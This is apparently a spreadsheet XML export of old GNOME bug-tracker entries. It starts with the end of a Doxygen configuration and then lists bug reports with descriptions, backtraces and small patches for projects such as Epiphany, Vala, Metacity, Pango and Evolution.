                         *.cxx \
                         *.cpp \
                         *.c++ \
                         *.d \
                         *.java \
                         *.ii \
                         *.ixx \
                         *.ipp \
                         *.i++ \
                         *.inl \
                         *.h \
                         *.hh \
                         *.hxx \
                         *.hpp \
                         *.h++ \
                         *.idl \
                         *.odl \
                         *.cs \
                         *.php \
                         *.php3 \
                         *.inc \
                         *.m \
                         *.mm \
                         *.dox \
                         *.C \
                         *.CC \
                         *.C++ \
                         *.II \
                         *.I++ \
                         *.H \
                         *.HH \
                         *.H++ \
                         *.CS \
                         *.PHP \
                         *.PHP3 \
                         *.M \
                         *.MM \
                         *.py \
                         *.PY
RECURSIVE              = YES
EXCLUDE                = 
EXCLUDE_SYMLINKS       = NO
EXCLUDE_PATTERNS       = 
EXAMPLE_PATH           = 
EXAMPLE_PATTERNS       = *
EXAMPLE_RECURSIVE      = NO
IMAGE_PATH             = 
INPUT_FILTER           = 
FILTER_PATTERNS        = 
FILTER_SOURCE_FILES    = NO
#---------------------------------------------------------------------------
# configuration options related to source browsing
#---------------------------------------------------------------------------
SOURCE_BROWSER         = YES
INLINE_SOURCES         = NO
STRIP_CODE_COMMENTS    = YES
REFERENCED_BY_RELATION = YES
REFERENCES_RELATION    = YES
USE_HTAGS              = NO
VERBATIM_HEADERS       = YES
#---------------------------------------------------------------------------
# configuration options related to the alphabetical class index
#---------------------------------------------------------------------------
ALPHABETICAL_INDEX     = YES
COLS_IN_ALPHA_INDEX    = 5
IGNORE_PREFIX          = 
#---------------------------------------------------------------------------
# configuration options related to the HTML output
#---------------------------------------------------------------------------
GENERATE_HTML          = YES
HTML_OUTPUT            = html
HTML_FILE_EXTENSION    = .html
HTML_HEADER            = 
HTML_FOOTER            = 
HTML_STYLESHEET        = 
HTML_ALIGN_MEMBERS     = YES
GENERATE_HTMLHELP      = NO
CHM_FILE               = 
HHC_LOCATION           = 
GENERATE_CHI           = NO
BINARY_TOC             = NO
TOC_EXPAND             = YES
DISABLE_INDEX          = NO
ENUM_VALUES_PER_LINE   = 4
GENERATE_TREEVIEW      = YES
TREEVIEW_WIDTH         = 250
#---------------------------------------------------------------------------
# configuration options related to the LaTeX output
#---------------------------------------------------------------------------
GENERATE_LATEX         = NO
LATEX_OUTPUT           = latex
LATEX_CMD_NAME         = latex
MAKEINDEX_CMD_NAME     = makeindex
COMPACT_LATEX          = NO
PAPER_TYPE             = a4wide
EXTRA_PACKAGES         = 
LATEX_HEADER           = 
PDF_HYPERLINKS         = NO
USE_PDFLATEX           = NO
LATEX_BATCHMODE        = NO
LATEX_HIDE_INDICES     = NO
#---------------------------------------------------------------------------
# configuration options related to the RTF output
#---------------------------------------------------------------------------
GENERATE_RTF           = NO
RTF_OUTPUT             = rtf
COMPACT_RTF            = NO
RTF_HYPERLINKS         = NO
RTF_STYLESHEET_FILE    = 
RTF_EXTENSIONS_FILE    = 
#---------------------------------------------------------------------------
# configuration options related to the man page output
#---------------------------------------------------------------------------
GENERATE_MAN           = NO
MAN_OUTPUT             = man
MAN_EXTENSION          = .3
MAN_LINKS              = NO
#---------------------------------------------------------------------------
# configuration options related to the XML output
#---------------------------------------------------------------------------
GENERATE_XML           = NO
XML_OUTPUT             = xml
XML_SCHEMA             = 
XML_DTD                = 
XML_PROGRAMLISTING     = YES
#---------------------------------------------------------------------------
# configuration options for the AutoGen Definitions output
#---------------------------------------------------------------------------
GENERATE_AUTOGEN_DEF   = NO
#---------------------------------------------------------------------------
# configuration options related to the Perl module output
#---------------------------------------------------------------------------
GENERATE_PERLMOD       = NO
PERLMOD_LATEX          = NO
PERLMOD_PRETTY         = YES
PERLMOD_MAKEVAR_PREFIX = 
#---------------------------------------------------------------------------
# Configuration options related to the preprocessor   
#---------------------------------------------------------------------------
ENABLE_PREPROCESSING   = YES
MACRO_EXPANSION        = NO
EXPAND_ONLY_PREDEF     = NO
SEARCH_INCLUDES        = YES
INCLUDE_PATH           = 
INCLUDE_FILE_PATTERNS  = 
PREDEFINED             = 
EXPAND_AS_DEFINED      = 
SKIP_FUNCTION_MACROS   = YES
#---------------------------------------------------------------------------
# Configuration::additions related to external references   
#---------------------------------------------------------------------------
TAGFILES               = 
GENERATE_TAGFILE       = 
ALLEXTERNALS           = NO
EXTERNAL_GROUPS        = YES
PERL_PATH              = /usr/bin/perl
#---------------------------------------------------------------------------
# Configuration options related to the dot tool   
#---------------------------------------------------------------------------
CLASS_DIAGRAMS         = YES
HIDE_UNDOC_RELATIONS   = NO
HAVE_DOT               = YES
CLASS_GRAPH            = YES
COLLABORATION_GRAPH    = YES
GROUP_GRAPHS           = YES
UML_LOOK               = YES
TEMPLATE_RELATIONS     = YES
INCLUDE_GRAPH          = YES
INCLUDED_BY_GRAPH      = YES
CALL_GRAPH             = YES
GRAPHICAL_HIERARCHY    = YES
DIRECTORY_GRAPH        = YES
DOT_IMAGE_FORMAT       = png
DOT_PATH               = /Applications/Graphviz.app/Contents/MacOS
DOTFILE_DIRS           = 
MAX_DOT_GRAPH_WIDTH    = 1024
MAX_DOT_GRAPH_HEIGHT   = 1024
MAX_DOT_GRAPH_DEPTH    = 1000
DOT_TRANSPARENT        = NO
DOT_MULTI_TARGETS      = NO
GENERATE_LEGEND        = YES
DOT_CLEANUP            = YES
#---------------------------------------------------------------------------
# Configuration::additions related to the search engine   
#---------------------------------------------------------------------------
SEARCHENGINE           = NO</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-333785</t>
  </si>
  <si>
    <t>sysadmin-guide</t>
  </si>
  <si>
    <t>Glossentries for new MENU system</t>
  </si>
  <si>
    <t>Documentation 
Section: Glossary
* vfolder
* vfolder information file
Correct version:
Nothing just remove those entries. Both are related to old menu system no
longer documented (and used).
Other information:
* I can remove them from CVS if you like.
* Maybe someone could write new glossentries for new (fd.o) MENU system</t>
  </si>
  <si>
    <t>EPIPHANY-503963</t>
  </si>
  <si>
    <t>copy and paste do not work within browser frame</t>
  </si>
  <si>
    <t>i know that epiphany-webkit is rather new undergoing rapid development and 
a lot of features do not yet work.  i am going to post the issues that i have 
run into so far so that you have a record on what works and what does not.
hopefully this will help you to track issues and improve the software faster.
the first issue is that copy and paste do not work in the browser frame.
ctrl-c ctrl-v ctrl-x and middle-click do not work.  also the right-click 
menu is completely missing (which may be a separate problem altogether).
note copy/paste works just fine in the address bar and other parts
of the epiphany-webkit application window.  only the main browser frame 
has the problem.
this is debian bug #452759 (http://bugs.debian.org/452759).</t>
  </si>
  <si>
    <t>DIA-62132</t>
  </si>
  <si>
    <t>UML Component not setting font</t>
  </si>
  <si>
    <t>Robert Wallace reported
... I've tried just starting Dia
and then opening the file from the menu and just opening it from the
command line.  Neither works.  When opening from the command line I get
the message Gdk-ERROR: undefined font type.  I'm using Dia 0.88.1 as
packaged for Debian 2.2_r3 from Ximian.  
He email the dia file to the list and I found a bug in the UML/Component
object - it doesn't call set_font before draw_string.
Patch follows as attachment.</t>
  </si>
  <si>
    <t>robert.young</t>
  </si>
  <si>
    <t>VALA-526651</t>
  </si>
  <si>
    <t>Gst.init_get_option_group () should return a reference</t>
  </si>
  <si>
    <t>A bindings bug see also
http://mail.gnome.org/archives/vala-list/2008-April/msg00016.html</t>
  </si>
  <si>
    <t>GNOME-CORE-19413</t>
  </si>
  <si>
    <t>Mailcheck+panel Segfault</t>
  </si>
  <si>
    <t xml:space="preserve">To: submit@bugs.gnome.org
From: Dave Seff 
Subject:  Mailcheck+panel Segfault
X-Mailer: bug-buddy 1.0
Package:  panel
Severity: normal
Version:  1.2.1
Synopsis: Mailcheck+panel Segfault
Class:    sw-bug
Distribution: Linux Mandrake release 7.1 (helium)
System: Linux 2.2.15-4mdk i686 unknown
C library: glibc-2.1.3-5mdk
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.2
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
remove the mailcheck applet from the panel and then right-click on the
panel. Whamo!!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x405dad49 in wait4 () from
/lib/libc.so.6
#0  0x405dad49 in wait4 () from /lib/libc.so.6
#1  0x4063b800 in ?? () from /lib/libc.so.6
#2  0x40167d1a in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0xd360d in ?? ()
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:03 -------
This bug was previously known as bug 19413 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=19413
Originally filed under the gnome-core product and general component.
The original reporter (dseff@bloomberg.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dseff</t>
  </si>
  <si>
    <t>GNOME-APPLETS-67539</t>
  </si>
  <si>
    <t>Article list crashes slashapp</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Severity: major
Version: 1.4.0.1
Synopsis: Article list crashes slashapp
Bugzilla-Product: gnome-applets
Bugzilla-Component: slashapp
Description:
Each time I ask for an article list (using right button to bring up the menu and selecting Articles) the app crashes.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0x40601689 in __wait4 () from /lib/libc.so.6
#0  0x40601689 in __wait4 () from /lib/libc.so.6
#1  0x4066aa58 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4014b366 in gnome_segv_handle () at eval.c:88
#3  
#4  0x4027f557 in gtk_label_new () at eval.c:88
#5  0x804bb69 in populate_article_window () at eval.c:88
#6  0x804b9b4 in show_article_window () at eval.c:88
#7  0x4007346f in server_applet_do_callback () at eval.c:88
#8  0x4007a170 in _ORBIT_skel_GNOME_Applet_do_callback () at eval.c:88
#9  0x400b9995 in ORBit_POA_handle_request () at eval.c:88
#10 0x400bbda2 in CORBA_ORB_run () at eval.c:88
#11 0x400bbff1 in CORBA_ORB_run () at eval.c:88
#12 0x400d3224 in giop_main_handle_connection () at eval.c:88
#13 0x400873d0 in orb_handle_connection () at eval.c:88
#14 0x404bec40 in g_io_add_watch () at eval.c:88
#15 0x404c0308 in g_get_current_time () at eval.c:88
#16 0x404c0913 in g_get_current_time () at eval.c:88
#17 0x404c0aac in g_main_run () at eval.c:88
#18 0x4028a7e7 in gtk_main () at eval.c:88
#19 0x400731d0 in applet_widget_gtk_main () at eval.c:88
#20 0x804b125 in main () at eval.c:88
#21 0x4057c2eb in __libc_start_main (main=0x804b0a0  argc=5 
    ubp_av=0xbffff764 init=0x804a6d0  fini=0x804f1dc  
    rtld_fini=0x4000c130  stack_end=0xbffff75c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40601689 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4066aa58 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4014b366 in gnome_segv_handle () at eval.c:88
No locals.
#3  
No locals.
#4  0x4027f557 in gtk_label_new () at eval.c:88
88	in eval.c
No locals.
#5  0x804bb69 in populate_article_window () at eval.c:88
88	in eval.c
No locals.
#6  0x804b9b4 in show_article_window () at eval.c:88
88	in eval.c
No locals.
#7  0x4007346f in server_applet_do_callback () at eval.c:88
88	in eval.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-12-26 08:23 -------
The original reporter (jesse@phiwumbda.localnet) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>TOTEM-151909</t>
  </si>
  <si>
    <t>Add frame-by-frame playback</t>
  </si>
  <si>
    <t>I wanted to put out a request to one of the video players for this feature and
totem is currently my favorite.  However all the video players for Linux are
lacking this feature.  A little backstory on why this is important:
I work for the studio that made the Jimmy Neutron movie and tv series for
Nickelodeon.  We are currently starting production on another movie (unrelated
to Jimmy Neutron) and are moving to linux across the entire studio.  However
the major hang up right now is a video player that works the way we want and
scrubbing is one of the most important features.
Animators when playing back rendered views of their work need to be able to
scrub back and forth on the animation.  Even better quicktime has the ability
to go frame by frame using the left and right arrow keys.  This allows the
artist to look at the animation in excruciating detail.  Without it
scrutinizing a playback is quite difficult.
This feature isn't available on most video players even on windows.  But it is
one that is very useful for us and I wanted to express our studio's concern for
this one little feature.</t>
  </si>
  <si>
    <t>pickler</t>
  </si>
  <si>
    <t>EPIPHANY-133894</t>
  </si>
  <si>
    <t>Open Link in New Tab/Window URL</t>
  </si>
  <si>
    <t>When Open Link in New Tab or Open Link in New Window is selected the
URL is set to about:blank until the page loads which could be several
seconds
or even a timeout.  If you press stop or the page load times out then
press refresh only the blank page is displayed.</t>
  </si>
  <si>
    <t>RHYTHMBOX-502006</t>
  </si>
  <si>
    <t>please use ~/.cache/ for large files like song_info.xml or rhythmdb.xml</t>
  </si>
  <si>
    <t>Hi!
First thanks for the really great integration of Magnatune/Jamendo. I discovered that feature yesterday and loved it (already bought an album). Just today I discovered that my daily backup grew larger by quite much.
RB currently stores its downloaded catalogs as well as rhythmdb.xml to .gnome2/rhythmbox/. Since all of these aren't precious files but just caches it would be much preferable to put them into ~/.cache/rhythmbox/ so that they don't land in backups.
Thanks for considering
Martin</t>
  </si>
  <si>
    <t>NAUTILUS-46485</t>
  </si>
  <si>
    <t>EI: don't bother to check deps on a skipped package</t>
  </si>
  <si>
    <t xml:space="preserve">after EI decides to skip a package it goes ahead and does extensive dep
checking anyway.  this could be optimized away.  not very high priority.
log:
07-Feb 22:19:46.55 d: package search url:
http://narn.eazel.com:8888/catalog/install?rpm_id=430&amp;arch=i386&amp;distro=RedHat62&amp;protocol=http
07-Feb 22:19:50.36 d: (softcat db revision 1)
07-Feb 22:19:50.37 d: package info ok.
07-Feb 22:19:50.37 d: check_existing 0x80bc4f8 grip
07-Feb 22:19:50.40 d: versions are equal (2.95) comparing minors
07-Feb 22:19:50.40 d: minors are 0_helix_1 for new and 0_helix_1 for
installed)
07-Feb 22:19:50.40 d: grip-0_helix_1 version 2.95-0_helix_1 already
installed
07-Feb 22:19:50.40 d: Package skipped
[... then later ...]
07-Feb 22:19:58.72 d: 0x80bc4f8 (grip v2.95) 430 filled
d737c7b2c1bed5a5a1d49d20d1f8cfb9
07-Feb 22:19:58.72 d:   0x80bfa90 (XFree86-libs v3.3.6) 5657 not filled
fc4bf8a9aa7f1544d23c77704b915876
07-Feb 22:19:58.72 d:   0x80bf9f0 (glibc v2.1.3) 5569 not filled
2197ca4a7bce75b8f71e776198ea6ad6
07-Feb 22:19:58.72 d:   0x8092a50 (glib v1.2.8) 288 not filled
acf89a2f0df309d667a48d7f3a7535ae
07-Feb 22:19:58.72 d:   0x8098320 (gtk+ v1.2.8) 315 not filled
80a9a85f77f9cf82f56d86b90f9e406c
07-Feb 22:19:58.72 d:   0x8098870 (ldconfig v1.9.5) 5969 not filled
f8538a36c0ff452b1758943e1ba9945a
[... then later ...]
07-Feb 22:19:58.93 d: check deps for 0x80bc4f8 grip
07-Feb 22:19:58.93 d: is_satisfied? 0x80bfa90 XFree86-libs
07-Feb 22:19:58.93 d:   --&gt; dep hash ok
07-Feb 22:19:58.93 d: is_satisfied? 0x80bf9f0 glibc
07-Feb 22:19:58.93 d:   --&gt; dep hash ok
07-Feb 22:19:58.93 d: is_satisfied? 0x8092a50 glib
07-Feb 22:19:58.93 d:   --&gt; dep hash ok
07-Feb 22:19:58.93 d: is_satisfied? 0x8098320 gtk+
07-Feb 22:19:58.93 d:   --&gt; dep hash ok
07-Feb 22:19:58.93 d: is_satisfied? 0x8098870 ldconfig
07-Feb 22:19:58.93 d:   --&gt; dep hash ok
07-Feb 22:19:58.93 d: removing 0x8098870 ldconfig from 0x80bc4f8 grip
07-Feb 22:19:58.93 d: removing 0x8098320 gtk+ from 0x80bc4f8 grip
07-Feb 22:19:58.93 d: removing 0x8092a50 glib from 0x80bc4f8 grip
07-Feb 22:19:58.93 d: removing 0x80bf9f0 glibc from 0x80bc4f8 grip
07-Feb 22:19:58.93 d: removing 0x80bfa90 XFree86-libs from 0x80bc4f8
grip
... then it finally removes it later in the subpruner.
------- Additional Comments From sullivan@eazel.com 2001-02-09 17:47:38 ----
not very high priority translates to not 1.0 to my ears.
------- Additional Comments From eskil@eskil.dk 2001-02-12 14:19:17 ----
Yeah this just slows down the dep check process a bit.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:59 -------
</t>
  </si>
  <si>
    <t>VALA-523889</t>
  </si>
  <si>
    <t>Missing and wrong declaration modifiers in the json-glib binding</t>
  </si>
  <si>
    <t>Please describe the problem:
Several function prototypes in the json-glib binding for vala have wrong declaration modifiers related to memory management or calling convention. The latter make it impossible to call the functions correctly as in and out parameters are mixed up.
The affected functions are:
  Json.Generator.string to_data
  Json.Parser.has_assignment
  Json.Serializable.serialize_property
  Json.construct_gobject
  Json.serialize_gobject
Steps to reproduce:
For example Json.serialize cannot be called in a way that allows retrieval of the resulting string's length. While the C prototype of the function is
  char* json_serialize_gobject(GObject *gobject gsize *length)
the vala prototype of the function is
  public static weak string serialize_gobject (GLib.Object gobject ulong length)
Clearly this should read out ulong length rather than ulong length. Additionally the return value from this function is freshly g_malloced so the prototype should start with public static string rather than public static weak string.
Actual results:
When trying to call the functions as they are intended either valac or the C compiler report problems.
Expected results:
It should just work -)
Does this happen every time?
Yes.
Other information:
The problems can be trivially fixed using this patch:
--- /opt/local/share/vala/vapi/json-glib-1.0.vapi~	2008-03-22 01:28:17.000000000 +0100
+++ /opt/local/share/vala/vapi/json-glib-1.0.vapi	2008-03-22 17:36:49.000000000 +0100
@@ -787 +787 @@
 	public class Generator : GLib.Object {
 		public Generator ()
 		public void set_root (Json.Node node)
-		public weak string to_data (ulong length)
+		public string to_data (out ulong length)
 		public bool to_file (string filename) throws GLib.Error
 		[NoAccessorMethod]
 		public weak uint indent { get set }
@@ -937 +937 @@
 		public uint get_current_line ()
 		public uint get_current_pos ()
 		public weak Json.Node get_root ()
-		public bool has_assignment (string variable_name)
+		public bool has_assignment (out weak string variable_name)
 		public bool load_from_data (string data ulong length) throws GLib.Error
 		public bool load_from_file (string filename) throws GLib.Error
 		public Parser ()
@@ -11013 +11013 @@
 	[CCode (cheader_filename = json-glib/json-glib.h)]
 	public interface Serializable {
 		public abstract bool deserialize_property (string property_name GLib.Value value GLib.ParamSpec pspec Json.Node property_node)
-		public abstract weak Json.Node serialize_property (string property_name GLib.Value value GLib.ParamSpec pspec)
+		public abstract Json.Node serialize_property (string property_name GLib.Value value GLib.ParamSpec pspec)
 	}
 	public const int MAJOR_VERSION
 	public const int MICRO_VERSION
 	public const int MINOR_VERSION
 	public const int VERSION_HEX
 	public const string VERSION_S
-	public static weak GLib.Object construct_gobject (GLib.Type gtype string data ulong length) throws GLib.Error
-	public static weak string serialize_gobject (GLib.Object gobject ulong length)
+	public static GLib.Object construct_gobject (GLib.Type gtype string data ulong length) throws GLib.Error
+	public static string serialize_gobject (GLib.Object gobject out ulong length)
 }</t>
  </si>
  <si>
    <t>chust</t>
  </si>
  <si>
    <t>METACITY-361054</t>
  </si>
  <si>
    <t>strict focus mode still not working should look for res_class not res_name</t>
  </si>
  <si>
    <t>Please describe the problem:
strict focus mode is still not working correctly if I run xterm and 
say start xcalc from it xcalc gets focus even though it should not.
(by strict focus mode I mean with /apps/metacity/general/focus_new_windows set to strict).
The problem is that the function to determine whether the currently-focused window is a terminal is comparing window-&gt;res_name to a set of known
terminal applications but it's comparing literals that are
apparently more suited to compare with window-&gt;res_class.
I'm not certain what the intent was here since res_name can be set by
the user res_class would be somewhat safer so perhaps res_class is correct.
Either
1) the strcmp(window-&gt;res_name..) should be strcasecmp (or something equivalent that ignores case) or
2) the strings to compare against should be the first string in the WM_CLASS
window atom which is generally lower-case (i.e. xterm instead of XTerm)
or
3) the strcmp should be done against window-&gt;res_class instead of res_name.
Any of the above fixes resolves the issue starting xcalc (or any other
app that *can* take focus) from xterm now leaves the focus in xterm
(when 
Steps to reproduce:
1. set /apps/metacity/general/focus_new_windows to strict
2. from an xterm type xcalc &amp;
Actual results:
Focus is granted to the new xcalc window
Expected results:
I expect the focus to stay with the parent xterm window
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>dan.mick</t>
  </si>
  <si>
    <t>GNUMERIC-675224</t>
  </si>
  <si>
    <t>Insert column error</t>
  </si>
  <si>
    <t>Running Gnumeric 1.10.17 on Ubuntu 12.04.
1. Open Gnumeric.
2. Rescale sheet to 128 columns and rows.
3. Fill all cells in column A with a.
4. Right-click to select column A (or any other column) and insert column.
5. Error message appears.
What seems to happen: Insert new row - Gnumeric correctly checks for a filled last row. Insert new column - Gnumeric incorrectly checks the last row not the last column and therefore brings either a wrong error message or simply overwrites a filled last column.
Regards
Soeren</t>
  </si>
  <si>
    <t>so09</t>
  </si>
  <si>
    <t>GSTREAMER-367677</t>
  </si>
  <si>
    <t>[fdsrc] skips the first byte</t>
  </si>
  <si>
    <t>Please describe the problem:
It seems that he first byte of input is always lost when reading through fdsrc element.
Steps to reproduce:
See attached script for a test case and then diff the source and dest file or compare them via hexdump -c -n 10 for instance.
(If you use a filesrc the problem disapear)
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>damien.genet</t>
  </si>
  <si>
    <t>EVOLUTION-253219</t>
  </si>
  <si>
    <t>edit-as-new deletes original message</t>
  </si>
  <si>
    <t>Description of Problem:
I chose a message in my Sent folder and selected edit-as-new.  Targeted
the message at a new set of recipients (since there's still no bounce
functionality) and hit send.
Surprisingly the original message was deleted from my Sent folder.
This is unintuative and probably not the right thing.</t>
  </si>
  <si>
    <t>PANGO-116860</t>
  </si>
  <si>
    <t>pango gsub processing results in faulty text rendering</t>
  </si>
  <si>
    <t>Due to a typo in the GSUB processing of pango text in kannada
is not rendered properly:
ftp://ftp.gtk.org/incoming/ftxgsub-bad.png
ftp://ftp.gtk.org/incoming/ftxgsub-good.png
This is a patch to fix it:
Index: ftxgsub.c
===================================================================
RCS file: /cvs/gnome/pango/pango/opentype/ftxgsub.cv
retrieving revision 1.6
diff -u -r1.6 ftxgsub.c
--- ftxgsub.c	16 Apr 2003 03:58:17 -0000	1.6
+++ ftxgsub.c	7 Jul 2003 05:59:59 -0000
@@ -38237 +38237 @@
     /* we are starting for lookahead glyphs right after the last context
        glyph                                                             */
-    curr_pos = j
+    curr_pos += j
     s_in     = 
     lc       = ccsf3-&gt;LookaheadCoverage</t>
  </si>
  <si>
    <t>klchxbec</t>
  </si>
  <si>
    <t>GNOME-VFS-331719</t>
  </si>
  <si>
    <t>latex docs beginning with comment (%) detected as MATLAB file</t>
  </si>
  <si>
    <t>latex documents beginning with a comment (%) in the first line are detected as MATLAB script/function file</t>
  </si>
  <si>
    <t>CUPID-160751</t>
  </si>
  <si>
    <t>CUPID</t>
  </si>
  <si>
    <t>Opening preferences reduces audio volume to 0</t>
  </si>
  <si>
    <t>While running gst-recorder each time I open the preferences dialog the volume
of my sound card gets reduced to 0. Opening the preferences dialog should not
change my volume settings.</t>
  </si>
  <si>
    <t>cupid-maint</t>
  </si>
  <si>
    <t>TOTEM-300973</t>
  </si>
  <si>
    <t>Show visual effects preference not toggling</t>
  </si>
  <si>
    <t>Under the Visual Effects category on the Display tab of Totem's Preference
dialog I tried to uncheck the Show visual effects when an audio file is
played option. The Type of visualisation and Visualisation size entries
became greyed out but the Show visual effects... option remained checked.</t>
  </si>
  <si>
    <t>GLOM-344815</t>
  </si>
  <si>
    <t>cvs glom fails to compile -- unused parameters in box_data.cc &amp; box_data_list.cc &amp; flowtablewithfields.cc &amp; comboglom.cc &amp; report_builder.cc &amp; base_db.cc &amp; combobox_relationship.cc</t>
  </si>
  <si>
    <t>box_data.cc:454: warning: unused parameter 'field_value'
box_data.cc:136: warning: unused parameter 'row'
box_data.cc:136: warning: unused parameter 'value'
make[3]: *** [box_data.o] Error 1
make[3]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom/mode_data'
box_data_list.cc:253: warning: unused parameter 'col_with_first_value'
make[3]: *** [box_data_list.o] Error 1
make[3]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom/mode_data'
flowtablewithfields.cc:507: warning: unused parameter 'table_name'
flowtablewithfields.cc:476: warning: unused parameter 'table_name'
flowtablewithfields.cc:457: warning: unused parameter 'table_name'
make[4]: *** [flowtablewithfields.o] Error 1
make[4]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom/utility_widgets'
comboglom.cc:231: warning: unused parameter 'read_only'
make[4]: *** [comboglom.o] Error 1
make[4]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom/utility_widgets'
report_builder.cc:431: warning: unused parameter 'found_set'
report_builder.cc:421: warning: unused parameter 'found_set'
make[3]: *** [report_builder.o] Error 1
make[3]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom/reports'
combobox_relationship.cc:250: warning: unused parameter 'model'
make[3]: *** [combobox_relationship.o] Error 1
make[3]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom'
base_db.cc:2119: warning: unused parameter 'table_name'
base_db.cc:2114: warning: unused parameter 'field_in_record_changed'
base_db.cc:2114: warning: unused parameter 'row'
base_db.cc:1841: warning: unused parameter 'parent_window'
base_db.cc:350: warning: unused parameter 'including_system_fields'
base_db.cc:168: warning: unused parameter 'parent_window'
make[3]: *** [base_db.o] Error 1
make[3]: Leaving directory `/export/home/b/newrenTemp/gnome/glom/glom'</t>
  </si>
  <si>
    <t>GNOME-KEYRING-130332</t>
  </si>
  <si>
    <t>typo in gnome-keyring.[ch]</t>
  </si>
  <si>
    <t>gboolean gnome_keyring_is_availible (void)
Should be available.</t>
  </si>
  <si>
    <t>GTKHTML-204011</t>
  </si>
  <si>
    <t>Mail prints in a variable-width font.</t>
  </si>
  <si>
    <t>When I print a mail (to the printer a file or print preview)
the font used is variable-width even though the on-screen display
font is fixed-width.  This is wrong.</t>
  </si>
  <si>
    <t>EVOLUTION-212275</t>
  </si>
  <si>
    <t>Occasional refusal to move mail to IMAP folders</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.15
Synopsis: Occasional refusal to move mail to IMAP folders
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I've been moving large quantities of mail (500 messages or so) from a
local mail folder to an IMAP mail folder. For the first five or so
moves it works fine but after a while it refuses to move the mail -
when I select the destination folder and click OK nothing happens. No
error message no response at all. If I exit Evolution then restart it
the move works fine.
Unknown reporter: will.morton@irmplc.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>will.morton</t>
  </si>
  <si>
    <t>YELP-381431</t>
  </si>
  <si>
    <t>remove unnecessary markup</t>
  </si>
  <si>
    <t>You don't need to add  around the primary text in a message dialogue when you have secondary text it'll be made bigger and bold automagically.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-145087</t>
  </si>
  <si>
    <t>cannot install .mo files into $prefix/share/locale in Solaris</t>
  </si>
  <si>
    <t>In Solaris .mo files cannot be installed into $prefix/share/locale.
Because configure.in is not configured correctly CATOBJEXT become .mo and 
the installation path become $prefix/lib/locale by mistake.
This issue does not occur on Linux. This is specific issue on Solaris.
I attached the patch.
The order of the keywords in configure.in is important. then we can configure 
CATOBJEXT to .gmo and install path to $prefix/share/locale.</t>
  </si>
  <si>
    <t>INTLTOOL-106082</t>
  </si>
  <si>
    <t>intltool-update --version broken in CVS</t>
  </si>
  <si>
    <t>Using the current CVS version of intltool-update (intltool-update.in
revision 1.79) gives the following error when called with the --version option:
Global symbol @file requires explicit package name at
/usr/local/bin/intltool-update line 581.
Execution of /usr/local/bin/intltool-update aborted due to compilation errors.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-258375</t>
  </si>
  <si>
    <t>Evolution crashes when renamed an exchange folder second time</t>
  </si>
  <si>
    <t>Description of Problem:
When I tried to rename the exchange folder second time evolution crashed
Steps to reproduce the problem:
1. Go to mail view.
2. Select any personal folder of exchange account.
3. Rename it. Select any other folder.
4. Once again select the renamed folder. It will give the error message
Error while Refreshing folder.
No such folder.
5. Rename it once again.
Actual Results:
Evolution will crash.
Expected Results:
It should rename the folder .
How often does this happen? 
Everytime
Additional Information:
Back trace is:
(gdb) thread apply all bt
Thread 12 (Thread 917515 (LWP 9745)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x415d3cc0 in g_async_queue_pop_intern_unlocked (queue=0x878f100 try=0
    end_time=0x0) at gasyncqueue.c:226
#4  0x415d3e74 in g_async_queue_pop (queue=0x878f100) at gasyncqueue.c:266
#5  0x41b285a6 in worker (data=0x0) at e-book-async.c:25
#6  0x41609416 in g_thread_create_proxy (data=0x86dfd48) at gthread.c:558
#7  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#8  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 11 (Thread 737290 (LWP 9650)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x87df148) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x87b5d68) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
---Type  to continue or q  to quit---
Thread 10 (Thread 704521 (LWP 9646)):
